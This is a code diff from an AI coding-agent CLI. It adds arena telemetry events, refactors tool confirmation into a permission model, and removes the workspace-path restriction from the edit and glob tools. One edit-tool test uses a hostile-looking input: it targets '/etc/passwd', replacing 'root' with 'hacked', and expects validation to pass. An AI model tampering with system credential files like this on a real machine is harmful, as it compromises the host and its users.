ArenaSessionStartedEvent): void { + const rumEvent = this.createActionEvent('arena', 'arena_session_started', { + properties: { + arena_session_id: event.arena_session_id, + model_ids: JSON.stringify(event.model_ids), + task_length: event.task_length, + }, + }); + + this.enqueueLogEvent(rumEvent); + this.flushIfNeeded(); + } + + logArenaAgentCompletedEvent(event: ArenaAgentCompletedEvent): void { + const rumEvent = this.createActionEvent('arena', 'arena_agent_completed', { + properties: { + arena_session_id: event.arena_session_id, + agent_session_id: event.agent_session_id, + agent_model_id: event.agent_model_id, + status: event.status, + duration_ms: event.duration_ms, + rounds: event.rounds, + total_tokens: event.total_tokens, + input_tokens: event.input_tokens, + output_tokens: event.output_tokens, + tool_calls: event.tool_calls, + successful_tool_calls: event.successful_tool_calls, + failed_tool_calls: event.failed_tool_calls, + }, + }); + + this.enqueueLogEvent(rumEvent); + this.flushIfNeeded(); + } + + logArenaSessionEndedEvent(event: ArenaSessionEndedEvent): void { + const rumEvent = this.createActionEvent('arena', 'arena_session_ended', { + properties: { + arena_session_id: event.arena_session_id, + status: event.status, + duration_ms: event.duration_ms, + display_backend: event.display_backend, + agent_count: event.agent_count, + completed_agents: event.completed_agents, + failed_agents: event.failed_agents, + cancelled_agents: event.cancelled_agents, + winner_model_id: event.winner_model_id, + }, + }); + + this.enqueueLogEvent(rumEvent); + this.flushIfNeeded(); + } + getProxyAgent() { const proxyUrl = this.config?.getProxy(); if (!proxyUrl) return undefined; diff --git a/packages/core/src/telemetry/tool-call-decision.ts b/packages/core/src/telemetry/tool-call-decision.ts index 167df10a3..b22a73c40 100644 --- a/packages/core/src/telemetry/tool-call-decision.ts +++ b/packages/core/src/telemetry/tool-call-decision.ts @@ -22,6 +22,8 @@ export function getDecisionFromOutcome( case ToolConfirmationOutcome.ProceedAlways: case ToolConfirmationOutcome.ProceedAlwaysServer: case ToolConfirmationOutcome.ProceedAlwaysTool: + case ToolConfirmationOutcome.ProceedAlwaysProject: + case ToolConfirmationOutcome.ProceedAlwaysUser: return ToolCallDecision.AUTO_ACCEPT; case ToolConfirmationOutcome.ModifyWithEditor: return ToolCallDecision.MODIFY; diff --git a/packages/core/src/telemetry/types.ts b/packages/core/src/telemetry/types.ts index d9c6b535d..4f0afea42 100644 --- a/packages/core/src/telemetry/types.ts +++ b/packages/core/src/telemetry/types.ts @@ -10,7 +10,7 @@ import type { ApprovalMode } from '../config/config.js'; import type { CompletedToolCall } from '../core/coreToolScheduler.js'; import { DiscoveredMCPTool } from '../tools/mcp-tool.js'; import type { FileDiff } from '../tools/tools.js'; -import { AuthType } from '../core/contentGenerator.js'; +import type { AuthType } from '../core/contentGenerator.js'; import { getDecisionFromOutcome, ToolCallDecision, @@ -35,55 +35,61 @@ export class StartSessionEvent implements BaseTelemetryEvent { 'event.timestamp': string; session_id: string; model: string; - embedding_model: string; sandbox_enabled: boolean; - core_tools_enabled: string; + core_tools_enabled?: string; approval_mode: string; - api_key_enabled: boolean; - vertex_ai_enabled: boolean; debug_enabled: boolean; + truncate_tool_output_threshold: number; + truncate_tool_output_lines: number; mcp_servers: string; telemetry_enabled: boolean; - telemetry_log_user_prompts_enabled: boolean; file_filtering_respect_git_ignore: boolean; mcp_servers_count: number; mcp_tools_count?: number; mcp_tools?: string; output_format: OutputFormat; + hooks?: string; + ide_enabled: boolean; + interactive_shell_enabled: boolean; skills?: string; subagents?: string; constructor(config: Config) { - const generatorConfig = config.getContentGeneratorConfig(); const mcpServers = config.getMcpServers(); const toolRegistry = config.getToolRegistry(); - let useGemini = false; - let useVertex = false; - if (generatorConfig && generatorConfig.authType) { - useGemini = generatorConfig.authType === AuthType.USE_GEMINI; - useVertex = generatorConfig.authType === AuthType.USE_VERTEX_AI; - } - this['event.name'] = 'cli_config'; this.session_id = config.getSessionId(); this.model = config.getModel(); - this.embedding_model = config.getEmbeddingModel(); this.sandbox_enabled = typeof config.getSandbox() === 'string' || !!config.getSandbox(); - this.core_tools_enabled = (config.getCoreTools() ?? []).join(','); + this.core_tools_enabled = ( + config.getPermissionManager?.()?.getAllowRawStrings() ?? + config.getCoreTools() ?? + [] + ).join(','); this.approval_mode = config.getApprovalMode(); - this.api_key_enabled = useGemini || useVertex; - this.vertex_ai_enabled = useVertex; this.debug_enabled = config.getDebugMode(); + this.truncate_tool_output_threshold = + config.getTruncateToolOutputThreshold(); + this.truncate_tool_output_lines = config.getTruncateToolOutputLines(); this.mcp_servers = mcpServers ? Object.keys(mcpServers).join(',') : ''; this.telemetry_enabled = config.getTelemetryEnabled(); - this.telemetry_log_user_prompts_enabled = - config.getTelemetryLogPromptsEnabled(); this.file_filtering_respect_git_ignore = config.getFileFilteringRespectGitIgnore(); this.mcp_servers_count = mcpServers ? Object.keys(mcpServers).length : 0; this.output_format = config.getOutputFormat(); + this.ide_enabled = config.getIdeMode(); + this.interactive_shell_enabled = config.getShouldUseNodePtyShell(); + + const hookSystem = config.getHookSystem(); + if (hookSystem) { + const allHooks = hookSystem.getAllHooks(); + const uniqueEventNames = [...new Set(allHooks.map((h) => h.eventName))]; + if (uniqueEventNames.length > 0) { + this.hooks = uniqueEventNames.join(','); + } + } if (toolRegistry) { const mcpTools = toolRegistry @@ -148,6 +154,18 @@ export class UserPromptEvent implements BaseTelemetryEvent { } } +export class UserRetryEvent implements BaseTelemetryEvent { + 'event.name': 'user_retry'; + 'event.timestamp': string; + prompt_id: string; + + constructor(prompt_id: string) { + this['event.name'] = 'user_retry'; + this['event.timestamp'] = new Date().toISOString(); + this.prompt_id = prompt_id; + } +} + export class ToolCallEvent implements BaseTelemetryEvent { 'event.name': 'tool_call'; 'event.timestamp': string; @@ -237,33 +255,36 @@ export class ApiErrorEvent implements BaseTelemetryEvent { 'event.timestamp': string; // ISO 8601 response_id?: string; model: string; - error: string; - error_type?: string; - status_code?: number | string; duration_ms: number; prompt_id: string; auth_type?: string; + // Human-readable error message (e.g. "Request failed with status 429") + error_message: string; + // Error class or category (e.g. "RateLimitError", "invalid_request_error") + error_type?: string; + // HTTP status code from the API response (e.g. 429, 500) + status_code?: number | string; - constructor( - response_id: string | undefined, - model: string, - error: string, - duration_ms: number, - prompt_id: string, - auth_type?: string, - error_type?: string, - status_code?: number | string, - ) { + constructor(opts: { + responseId?: string; + model: string; + durationMs: number; + promptId: string; + authType?: string; + errorMessage: string; + errorType?: string; + statusCode?: number | string; + }) { this['event.name'] = 'api_error'; this['event.timestamp'] = new Date().toISOString(); - this.response_id = response_id; - this.model = model; - this.error = error; - this.error_type = error_type; - this.status_code = status_code; - this.duration_ms = duration_ms; - this.prompt_id = prompt_id; - this.auth_type = auth_type; + this.response_id = opts.responseId; + this.model = opts.model; + this.duration_ms = opts.durationMs; + this.prompt_id = opts.promptId; + this.auth_type = opts.authType; + this.error_message = opts.errorMessage; + this.error_type = opts.errorType; + this.status_code = opts.statusCode; } } @@ -857,7 +878,128 @@ export type TelemetryEvent = | ModelSlashCommandEvent | AuthEvent | SkillLaunchEvent - | UserFeedbackEvent; + | UserFeedbackEvent + | ArenaSessionStartedEvent + | ArenaAgentCompletedEvent + | ArenaSessionEndedEvent; + +// ─── Arena Telemetry Events ──────────────────────────────────── + +export interface ArenaSessionStartedEvent extends BaseTelemetryEvent { + 'event.name': 'arena_session_started'; + arena_session_id: string; + model_ids: string[]; + task_length: number; +} + +export function makeArenaSessionStartedEvent({ + arena_session_id, + model_ids, + task_length, +}: Omit): ArenaSessionStartedEvent { + return { + 'event.name': 'arena_session_started', + 'event.timestamp': new Date().toISOString(), + arena_session_id, + model_ids, + task_length, + }; +} + +export type ArenaAgentCompletedStatus = 'completed' | 'failed' | 'cancelled'; + +export interface ArenaAgentCompletedEvent extends BaseTelemetryEvent { + 'event.name': 'arena_agent_completed'; + arena_session_id: string; + agent_session_id: string; + agent_model_id: string; + status: ArenaAgentCompletedStatus; + duration_ms: number; + rounds: number; + total_tokens: number; + input_tokens: number; + output_tokens: number; + tool_calls: number; + successful_tool_calls: number; + failed_tool_calls: number; +} + +export function makeArenaAgentCompletedEvent({ + arena_session_id, + agent_session_id, + agent_model_id, + status, + duration_ms, + rounds, + total_tokens, + input_tokens, + output_tokens, + tool_calls, + successful_tool_calls, + failed_tool_calls, +}: Omit): ArenaAgentCompletedEvent { + return { + 'event.name': 'arena_agent_completed', + 'event.timestamp': new Date().toISOString(), + arena_session_id, + agent_session_id, + agent_model_id, + status, + duration_ms, + rounds, + total_tokens, + input_tokens, + output_tokens, + tool_calls, + successful_tool_calls, + failed_tool_calls, + }; +} + +export type ArenaSessionEndedStatus = + | 'selected' + | 'discarded' + | 'failed' + | 'cancelled'; + +export interface ArenaSessionEndedEvent extends BaseTelemetryEvent { + 'event.name': 'arena_session_ended'; + arena_session_id: string; + status: ArenaSessionEndedStatus; + duration_ms: number; + display_backend?: string; + agent_count: number; + completed_agents: number; + failed_agents: number; + cancelled_agents: number; + winner_model_id?: string; +} + +export function makeArenaSessionEndedEvent({ + arena_session_id, + status, + duration_ms, + display_backend, + agent_count, + completed_agents, + failed_agents, + cancelled_agents, + winner_model_id, +}: Omit): ArenaSessionEndedEvent { + return { + 'event.name': 'arena_session_ended', + 'event.timestamp': new Date().toISOString(), + arena_session_id, + status, + duration_ms, + display_backend, + agent_count, + completed_agents, + failed_agents, + cancelled_agents, + winner_model_id, + }; +} export class ExtensionDisableEvent implements BaseTelemetryEvent { 'event.name': 'extension_disable'; diff --git a/packages/core/src/telemetry/uiTelemetry.test.ts b/packages/core/src/telemetry/uiTelemetry.test.ts index e45032619..37542273a 100644 --- a/packages/core/src/telemetry/uiTelemetry.test.ts +++ b/packages/core/src/telemetry/uiTelemetry.test.ts @@ -301,7 +301,7 @@ describe('UiTelemetryService', () => { 'event.name': EVENT_API_ERROR, model: 'gemini-2.5-pro', duration_ms: 300, - error: 'Something went wrong', + error_message: 'Something went wrong', } as ApiErrorEvent & { 'event.name': typeof EVENT_API_ERROR }; service.addEvent(event); @@ -342,7 +342,7 @@ describe('UiTelemetryService', () => { 'event.name': EVENT_API_ERROR, model: 'gemini-2.5-pro', duration_ms: 300, - error: 'Something went wrong', + error_message: 'Something went wrong', } as ApiErrorEvent & { 'event.name': typeof EVENT_API_ERROR }; service.addEvent(responseEvent); diff --git a/packages/core/src/telemetry/uiTelemetry.ts b/packages/core/src/telemetry/uiTelemetry.ts index 0f8f2146c..a7361f038 100644 --- a/packages/core/src/telemetry/uiTelemetry.ts +++ b/packages/core/src/telemetry/uiTelemetry.ts @@ -119,6 +119,7 @@ const createInitialMetrics = (): SessionMetrics => ({ export class UiTelemetryService extends EventEmitter { #metrics: SessionMetrics = createInitialMetrics(); #lastPromptTokenCount = 0; + #lastCachedContentTokenCount = 0; addEvent(event: UiEvent) { switch (event['event.name']) { @@ -158,12 +159,21 @@ export class UiTelemetryService extends EventEmitter { }); } + getLastCachedContentTokenCount(): number { + return this.#lastCachedContentTokenCount; + } + + setLastCachedContentTokenCount(count: number): void { + this.#lastCachedContentTokenCount = count; + } + /** * Resets metrics to the initial state (used when resuming a session). */ reset(): void { this.#metrics = createInitialMetrics(); this.#lastPromptTokenCount = 0; + this.#lastCachedContentTokenCount = 0; this.emit('update', { metrics: this.#metrics, lastPromptTokenCount: this.#lastPromptTokenCount, diff --git a/packages/core/src/test-utils/mock-tool.ts b/packages/core/src/test-utils/mock-tool.ts index 75bdf26c5..0e3cf293d 100644 --- a/packages/core/src/test-utils/mock-tool.ts +++ b/packages/core/src/test-utils/mock-tool.ts @@ -13,6 +13,7 @@ import type { ToolInvocation, ToolResult, } from '../tools/tools.js'; +import type { PermissionDecision } from '../permissions/types.js'; import { BaseDeclarativeTool, BaseToolInvocation, @@ -25,10 +26,10 @@ interface MockToolOptions { description?: string; canUpdateOutput?: boolean; isOutputMarkdown?: boolean; - shouldConfirmExecute?: ( - params: { [key: string]: unknown }, + getDefaultPermission?: () => Promise; + getConfirmationDetails?: ( signal: AbortSignal, - ) => Promise; + ) => Promise; execute?: ( params: { [key: string]: unknown }, signal?: AbortSignal, @@ -59,10 +60,14 @@ class MockToolInvocation extends BaseToolInvocation< } } - override shouldConfirmExecute( + override getDefaultPermission(): Promise { + return this.tool.getDefaultPermission(); + } + + override getConfirmationDetails( abortSignal: AbortSignal, - ): Promise { - return this.tool.shouldConfirmExecute(this.params, abortSignal); + ): Promise { + return this.tool.getConfirmationDetails(abortSignal); } getDescription(): string { @@ -77,10 +82,10 @@ export class MockTool extends BaseDeclarativeTool< { [key: string]: unknown }, ToolResult > { - shouldConfirmExecute: ( - params: { [key: string]: unknown }, + getDefaultPermission: () => Promise; + getConfirmationDetails: ( signal: AbortSignal, - ) => Promise; + ) => Promise; execute: ( params: { [key: string]: unknown }, signal?: AbortSignal, @@ -98,10 +103,22 @@ export class MockTool extends BaseDeclarativeTool< options.canUpdateOutput ?? false, ); - if (options.shouldConfirmExecute) { - this.shouldConfirmExecute = options.shouldConfirmExecute; + if (options.getDefaultPermission) { + this.getDefaultPermission = options.getDefaultPermission; } else { - this.shouldConfirmExecute = () => Promise.resolve(false); + this.getDefaultPermission = () => + Promise.resolve('allow' as PermissionDecision); + } + + if (options.getConfirmationDetails) { + this.getConfirmationDetails = options.getConfirmationDetails; + } else { + this.getConfirmationDetails = () => { + throw new Error( + `${this.name} returned 'ask' from getDefaultPermission() ` + + `but does not implement getConfirmationDetails().`, + ); + }; } if (options.execute) { @@ -122,7 +139,10 @@ export class MockTool extends BaseDeclarativeTool< } } -export const MOCK_TOOL_SHOULD_CONFIRM_EXECUTE = () => +export const MOCK_TOOL_GET_DEFAULT_PERMISSION = () => + Promise.resolve('ask' as PermissionDecision); + +export const MOCK_TOOL_GET_CONFIRMATION_DETAILS = () => Promise.resolve({ type: 'exec' as const, title: 'Confirm mockTool', @@ -152,22 +172,23 @@ export class MockModifiableToolInvocation extends BaseToolInvocation< ); } - override async shouldConfirmExecute( + override async getDefaultPermission(): Promise { + return this.tool.shouldConfirm ? 'ask' : 'allow'; + } + + override async getConfirmationDetails( _abortSignal: AbortSignal, - ): Promise { - if (this.tool.shouldConfirm) { - return { - type: 'edit', - title: 'Confirm Mock Tool', - fileName: 'test.txt', - filePath: 'test.txt', - fileDiff: 'diff', - originalContent: 'originalContent', - newContent: 'newContent', - onConfirm: async () => {}, - }; - } - return false; + ): Promise { + return { + type: 'edit', + title: 'Confirm Mock Tool', + fileName: 'test.txt', + filePath: 'test.txt', + fileDiff: 'diff', + originalContent: 'originalContent', + newContent: 'newContent', + onConfirm: async () => {}, + }; } getDescription(): string { diff --git a/packages/core/src/tools/askUserQuestion.test.ts b/packages/core/src/tools/askUserQuestion.test.ts index f9aabc2d9..9e8f36663 100644 --- a/packages/core/src/tools/askUserQuestion.test.ts +++ b/packages/core/src/tools/askUserQuestion.test.ts @@ -100,8 +100,8 @@ describe('AskUserQuestionTool', () => { }); }); - describe('shouldConfirmExecute', () => { - it('should return confirmation details in interactive mode', async () => { + describe('getDefaultPermission and getConfirmationDetails', () => { + it('should return ask permission and confirmation details in interactive mode', async () => { const params = { questions: [ { @@ -117,19 +117,20 @@ describe('AskUserQuestionTool', () => { }; const invocation = tool.build(params); - const confirmation = await invocation.shouldConfirmExecute( + const permission = await invocation.getDefaultPermission(); + expect(permission).toBe('ask'); + + const confirmation = await invocation.getConfirmationDetails( new AbortController().signal, ); - - expect(confirmation).not.toBe(false); - if (confirmation && confirmation.type === 'ask_user_question') { - expect(confirmation.type).toBe('ask_user_question'); + expect(confirmation.type).toBe('ask_user_question'); + if (confirmation.type === 'ask_user_question') { expect(confirmation.questions).toEqual(params.questions); expect(confirmation.onConfirm).toBeDefined(); } }); - it('should return false in non-interactive mode', async () => { + it('should return allow permission in non-interactive mode', async () => { (mockConfig.isInteractive as Mock).mockReturnValue(false); const params = { @@ -147,11 +148,8 @@ describe('AskUserQuestionTool', () => { }; const invocation = tool.build(params); - const confirmation = await invocation.shouldConfirmExecute( - new AbortController().signal, - ); - - expect(confirmation).toBe(false); + const permission = await invocation.getDefaultPermission(); + expect(permission).toBe('allow'); }); }); @@ -196,14 +194,12 @@ describe('AskUserQuestionTool', () => { }; const invocation = tool.build(params); - const confirmation = await invocation.shouldConfirmExecute( + const confirmation = await invocation.getConfirmationDetails( new AbortController().signal, ); - if (confirmation !== false) { - // Simulate user cancellation - await confirmation.onConfirm(ToolConfirmationOutcome.Cancel); - } + // Simulate user cancellation + await confirmation.onConfirm(ToolConfirmationOutcome.Cancel); const result = await invocation.execute(new AbortController().signal); expect(result.llmContent).toContain('declined to answer'); @@ -234,19 +230,17 @@ describe('AskUserQuestionTool', () => { }; const invocation = tool.build(params); - const confirmation = await invocation.shouldConfirmExecute( + const confirmation = await invocation.getConfirmationDetails( new AbortController().signal, ); - if (confirmation !== false) { - // Simulate user providing answers - await confirmation.onConfirm(ToolConfirmationOutcome.ProceedOnce, { - answers: { - '0': 'React', - '1': 'TypeScript', - }, - }); - } + // Simulate user providing answers + await confirmation.onConfirm(ToolConfirmationOutcome.ProceedOnce, { + answers: { + '0': 'React', + '1': 'TypeScript', + }, + }); const result = await invocation.execute(new AbortController().signal); diff --git a/packages/core/src/tools/askUserQuestion.ts b/packages/core/src/tools/askUserQuestion.ts index e1c6af26e..d33eb0fb7 100644 --- a/packages/core/src/tools/askUserQuestion.ts +++ b/packages/core/src/tools/askUserQuestion.ts @@ -9,6 +9,7 @@ import type { ToolConfirmationPayload, ToolResult, } from './tools.js'; +import type { PermissionDecision } from '../permissions/types.js'; import { BaseDeclarativeTool, BaseToolInvocation, @@ -154,20 +155,26 @@ class AskUserQuestionToolInvocation extends BaseToolInvocation< return `Ask user ${questionCount} question${questionCount > 1 ? 's' : ''}`; } - override async shouldConfirmExecute( - _abortSignal: AbortSignal, - ): Promise { - // Check if we're in a mode that supports user interaction - // ACP mode (VSCode extension, etc.) uses non-interactive mode but can still collect user input + /** + * ask_user_question always requires user confirmation so the user can + * provide answers. In non-interactive mode without ACP support, we skip + * confirmation (and subsequently skip execution). + */ + override async getDefaultPermission(): Promise { const isAcpMode = this._config.getExperimentalZedIntegration() || this._config.getInputFormat() === InputFormat.STREAM_JSON; if (!this._config.isInteractive() && !isAcpMode) { - // In non-interactive mode without ACP support, we cannot collect user input - return false; + // Non-interactive + no ACP: skip entirely + return 'allow'; } + return 'ask'; + } + override async getConfirmationDetails( + _abortSignal: AbortSignal, + ): Promise { const details: ToolAskUserQuestionConfirmationDetails = { type: 'ask_user_question', title: 'Please answer the following question(s):', diff --git a/packages/core/src/tools/edit.test.ts b/packages/core/src/tools/edit.test.ts index 21ee04244..c67520385 100644 --- a/packages/core/src/tools/edit.test.ts +++ b/packages/core/src/tools/edit.test.ts @@ -230,20 +230,18 @@ describe('EditTool', () => { ); }); - it('should return error for path outside root', () => { + it('should allow path outside root (external path support)', () => { const params: EditToolParams = { file_path: path.join(tempDir, 'outside-root.txt'), old_string: 'old', new_string: 'new', }; const error = tool.validateToolParams(params); - expect(error).toContain( - 'File path must be within one of the workspace directories', - ); + expect(error).toBeNull(); }); }); - describe('shouldConfirmExecute', () => { + describe('getConfirmationDetails', () => { const testFile = 'edit_me.txt'; let filePath: string; @@ -268,7 +266,7 @@ describe('EditTool', () => { new_string: 'new', }; const invocation = tool.build(params); - const confirmation = await invocation.shouldConfirmExecute( + const confirmation = await invocation.getConfirmationDetails( new AbortController().signal, ); expect(confirmation).toEqual( @@ -280,39 +278,7 @@ describe('EditTool', () => { ); }); - it('should return false and skip confirmation when approval mode is AUTO_EDIT', async () => { - fs.writeFileSync(filePath, 'some old content here'); - (mockConfig.getApprovalMode as Mock).mockReturnValue( - ApprovalMode.AUTO_EDIT, - ); - const params: EditToolParams = { - file_path: filePath, - old_string: 'old', - new_string: 'new', - }; - const invocation = tool.build(params); - const confirmation = await invocation.shouldConfirmExecute( - new AbortController().signal, - ); - expect(confirmation).toBe(false); - }); - - it('should return false and skip confirmation when approval mode is YOLO', async () => { - fs.writeFileSync(filePath, 'some old content here'); - (mockConfig.getApprovalMode as Mock).mockReturnValue(ApprovalMode.YOLO); - const params: EditToolParams = { - file_path: filePath, - old_string: 'old', - new_string: 'new', - }; - const invocation = tool.build(params); - const confirmation = await invocation.shouldConfirmExecute( - new AbortController().signal, - ); - expect(confirmation).toBe(false); - }); - - it('should return false if old_string is not found', async () => { + it('should throw if old_string is not found', async () => { fs.writeFileSync(filePath, 'some content here'); const params: EditToolParams = { file_path: filePath, @@ -320,13 +286,12 @@ describe('EditTool', () => { new_string: 'new', }; const invocation = tool.build(params); - const confirmation = await invocation.shouldConfirmExecute( - new AbortController().signal, - ); - expect(confirmation).toBe(false); + await expect( + invocation.getConfirmationDetails(new AbortController().signal), + ).rejects.toThrow(); }); - it('should return false if multiple occurrences of old_string are found', async () => { + it('should throw if multiple occurrences of old_string are found', async () => { fs.writeFileSync(filePath, 'old old content here'); const params: EditToolParams = { file_path: filePath, @@ -334,10 +299,9 @@ describe('EditTool', () => { new_string: 'new', }; const invocation = tool.build(params); - const confirmation = await invocation.shouldConfirmExecute( - new AbortController().signal, - ); - expect(confirmation).toBe(false); + await expect( + invocation.getConfirmationDetails(new AbortController().signal), + ).rejects.toThrow(); }); it('should request confirmation for creating a new file (empty old_string)', async () => { @@ -349,7 +313,7 @@ describe('EditTool', () => { new_string: 'new file content', }; const invocation = tool.build(params); - const confirmation = await invocation.shouldConfirmExecute( + const confirmation = await invocation.getConfirmationDetails( new AbortController().signal, ); expect(confirmation).toEqual( @@ -383,7 +347,7 @@ describe('EditTool', () => { }); await expect( - invocation.shouldConfirmExecute(abortController.signal), + invocation.getConfirmationDetails(abortController.signal), ).rejects.toBe(abortError); calculateSpy.mockRestore(); @@ -903,17 +867,14 @@ describe('EditTool', () => { expect(tool.validateToolParams(validPath)).toBeNull(); }); - it('should reject paths outside workspace root', () => { - const invalidPath = { + it('should allow paths outside workspace root (external path support)', () => { + const externalPath = { file_path: '/etc/passwd', old_string: 'root', new_string: 'hacked', }; - const error = tool.validateToolParams(invalidPath); - expect(error).toContain( - 'File path must be within one of the workspace directories', - ); - expect(error).toContain(rootDir); + const error = tool.validateToolParams(externalPath); + expect(error).toBeNull(); }); }); @@ -948,7 +909,7 @@ describe('EditTool', () => { }); const invocation = tool.build(params); - const confirmation = await invocation.shouldConfirmExecute( + const confirmation = await invocation.getConfirmationDetails( new AbortController().signal, ); diff --git a/packages/core/src/tools/edit.ts b/packages/core/src/tools/edit.ts index 474a6aace..e5b1480b9 100644 --- a/packages/core/src/tools/edit.ts +++ b/packages/core/src/tools/edit.ts @@ -14,13 +14,14 @@ import type { ToolLocation, ToolResult, } from './tools.js'; +import type { PermissionDecision } from '../permissions/types.js'; import { BaseDeclarativeTool, Kind, ToolConfirmationOutcome } from './tools.js'; import { ToolErrorType } from './tool-error.js'; import { makeRelative, shortenPath } from '../utils/paths.js'; import { isNodeError } from '../utils/errors.js'; import type { Config } from '../config/config.js'; import { ApprovalMode } from '../config/config.js'; -import { FileEncoding } from '../services/fileSystemService.js'; +import { FileEncoding, needsUtf8Bom } from '../services/fileSystemService.js'; import { DEFAULT_DIFF_OPTIONS, getDiffStat } from './diffOptions.js'; import { ReadFileTool } from './read-file.js'; import { ToolNames, ToolDisplayNames } from './tool-names.js'; @@ -38,7 +39,6 @@ import type { } from './modifiable-tool.js'; import { IdeClient } from '../ide/ide-client.js'; import { safeLiteralReplace } from '../utils/textUtils.js'; -import { createDebugLogger } from '../utils/debugLogger.js'; import { countOccurrences, extractEditSnippet, @@ -46,8 +46,6 @@ import { normalizeEditStrings, } from '../utils/editHelper.js'; -const debugLogger = createDebugLogger('EDIT'); - export function applyReplacement( currentContent: string | null, oldString: string, @@ -263,17 +261,18 @@ class EditToolInvocation implements ToolInvocation { } /** - * Handles the confirmation prompt for the Edit tool in the CLI. - * It needs to calculate the diff to show the user. + * Edit operations always need user confirmation (unless overridden by PM or ApprovalMode). */ - async shouldConfirmExecute( - abortSignal: AbortSignal, - ): Promise { - const mode = this.config.getApprovalMode(); - if (mode === ApprovalMode.AUTO_EDIT || mode === ApprovalMode.YOLO) { - return false; - } + async getDefaultPermission(): Promise { + return 'ask'; + } + /** + * Constructs the edit diff confirmation details. + */ + async getConfirmationDetails( + abortSignal: AbortSignal, + ): Promise { let editData: CalculatedEdit; try { editData = await this.calculateEdit(this.params); @@ -282,13 +281,11 @@ class EditToolInvocation implements ToolInvocation { throw error; } const errorMsg = error instanceof Error ? error.message : String(error); - debugLogger.warn(`Error preparing edit: ${errorMsg}`); - return false; + throw new Error(`Error preparing edit: ${errorMsg}`); } if (editData.error) { - debugLogger.warn(`Error: ${editData.error.display}`); - return false; + throw new Error(`Edit error: ${editData.error.display}`); } const fileName = path.basename(this.params.file_path); @@ -322,8 +319,6 @@ class EditToolInvocation implements ToolInvocation { if (ideConfirmation) { const result = await ideConfirmation; if (result.status === 'accepted' && result.content) { - // TODO(chrstn): See https://github.com/google-gemini/gemini-cli/pull/5618#discussion_r2255413084 - // for info on a possible race condition where the file is modified on disk while being edited. this.params.old_string = editData.currentContent ?? ''; this.params.new_string = result.content; } @@ -397,8 +392,14 @@ class EditToolInvocation implements ToolInvocation { // For new files, apply default file encoding setting // For existing files, preserve the original encoding (BOM and charset) if (editData.isNewFile) { - const useBOM = - this.config.getDefaultFileEncoding() === FileEncoding.UTF8_BOM; + const userEncoding = this.config.getDefaultFileEncoding(); + let useBOM = false; + if (userEncoding === FileEncoding.UTF8_BOM) { + useBOM = true; + } else if (userEncoding === undefined) { + // No explicit setting: auto-detect (e.g. .ps1 on non-UTF-8 Windows) + useBOM = needsUtf8Bom(this.params.file_path); + } await this.config.getFileSystemService().writeTextFile({ path: this.params.file_path, content: editData.newContent, @@ -577,12 +578,6 @@ Expectation for required parameters: return `File path must be absolute: ${params.file_path}`; } - const workspaceContext = this.config.getWorkspaceContext(); - if (!workspaceContext.isPathWithinWorkspace(params.file_path)) { - const directories = workspaceContext.getDirectories(); - return `File path must be within one of the workspace directories: ${directories.join(', ')}`; - } - return null; } diff --git a/packages/core/src/tools/exitPlanMode.test.ts b/packages/core/src/tools/exitPlanMode.test.ts index 8f5e41634..51de9dda5 100644 --- a/packages/core/src/tools/exitPlanMode.test.ts +++ b/packages/core/src/tools/exitPlanMode.test.ts @@ -119,7 +119,9 @@ describe('ExitPlanModeTool', () => { expect(invocation).toBeDefined(); expect(invocation.params).toEqual(params); - const confirmation = await invocation.shouldConfirmExecute(signal); + expect(await invocation.getDefaultPermission()).toBe('ask'); + + const confirmation = await invocation.getConfirmationDetails(signal); expect(confirmation).toMatchObject({ type: 'plan', title: 'Would you like to proceed?', @@ -154,7 +156,7 @@ describe('ExitPlanModeTool', () => { const signal = new AbortController().signal; const invocation = tool.build(params); - const confirmation = await invocation.shouldConfirmExecute(signal); + const confirmation = await invocation.getConfirmationDetails(signal); if (confirmation) { expect(confirmation.type).toBe('plan'); @@ -178,7 +180,7 @@ describe('ExitPlanModeTool', () => { const signal = new AbortController().signal; const invocation = tool.build(params); - const confirmation = await invocation.shouldConfirmExecute(signal); + const confirmation = await invocation.getConfirmationDetails(signal); if (confirmation) { await confirmation.onConfirm(ToolConfirmationOutcome.Cancel); diff --git a/packages/core/src/tools/exitPlanMode.ts b/packages/core/src/tools/exitPlanMode.ts index 0f06add54..cc5894766 100644 --- a/packages/core/src/tools/exitPlanMode.ts +++ b/packages/core/src/tools/exitPlanMode.ts @@ -5,6 +5,7 @@ */ import type { ToolPlanConfirmationDetails, ToolResult } from './tools.js'; +import type { PermissionDecision } from '../permissions/types.js'; import { BaseDeclarativeTool, BaseToolInvocation, @@ -76,7 +77,14 @@ class ExitPlanModeToolInvocation extends BaseToolInvocation< return 'Plan:'; } - override async shouldConfirmExecute( + /** + * Plan mode exit always requires user confirmation. + */ + override async getDefaultPermission(): Promise { + return 'ask'; + } + + override async getConfirmationDetails( _abortSignal: AbortSignal, ): Promise { const details: ToolPlanConfirmationDetails = { diff --git a/packages/core/src/tools/glob.test.ts b/packages/core/src/tools/glob.test.ts index b6a04c35f..dc1537930 100644 --- a/packages/core/src/tools/glob.test.ts +++ b/packages/core/src/tools/glob.test.ts @@ -244,13 +244,14 @@ describe('GlobTool', () => { expect(result.llmContent).toContain('Found 2 file(s)'); }); - it('should return error if path is outside workspace', async () => { - // Bypassing validation to test execute method directly - vi.spyOn(globTool, 'validateToolParams').mockReturnValue(null); - const params: GlobToolParams = { pattern: '*.txt', path: '/etc' }; + it('should allow path outside workspace (external path support)', async () => { + const params: GlobToolParams = { pattern: '*.txt', path: '/tmp' }; const invocation = globTool.build(params); + // External path is now allowed - it should not return a workspace error const result = await invocation.execute(abortSignal); - expect(result.returnDisplay).toBe('Error: Path is not within workspace'); + expect(result.returnDisplay).not.toContain( + 'Path is not within workspace', + ); }); it('should return a GLOB_EXECUTION_ERROR on glob failure', async () => { @@ -322,9 +323,8 @@ describe('GlobTool', () => { pattern: '*.txt', path: '../../../../../../../../../../tmp', // Definitely outside }; - expect(specificGlobTool.validateToolParams(paramsOutside)).toContain( - 'Path is not within workspace', - ); + // External paths are now allowed (permission handled at runtime) + expect(specificGlobTool.validateToolParams(paramsOutside)).toBeNull(); }); it('should return error if specified search path does not exist', async () => { @@ -351,9 +351,8 @@ describe('GlobTool', () => { const invalidPath = { pattern: '*.ts', path: '../..' }; expect(globTool.validateToolParams(validPath)).toBeNull(); - expect(globTool.validateToolParams(invalidPath)).toContain( - 'Path is not within workspace', - ); + // External paths are now allowed (permission handled at runtime) + expect(globTool.validateToolParams(invalidPath)).toBeNull(); }); it('should work with paths in workspace subdirectories', async () => { diff --git a/packages/core/src/tools/glob.ts b/packages/core/src/tools/glob.ts index 74af58081..12a29922a 100644 --- a/packages/core/src/tools/glob.ts +++ 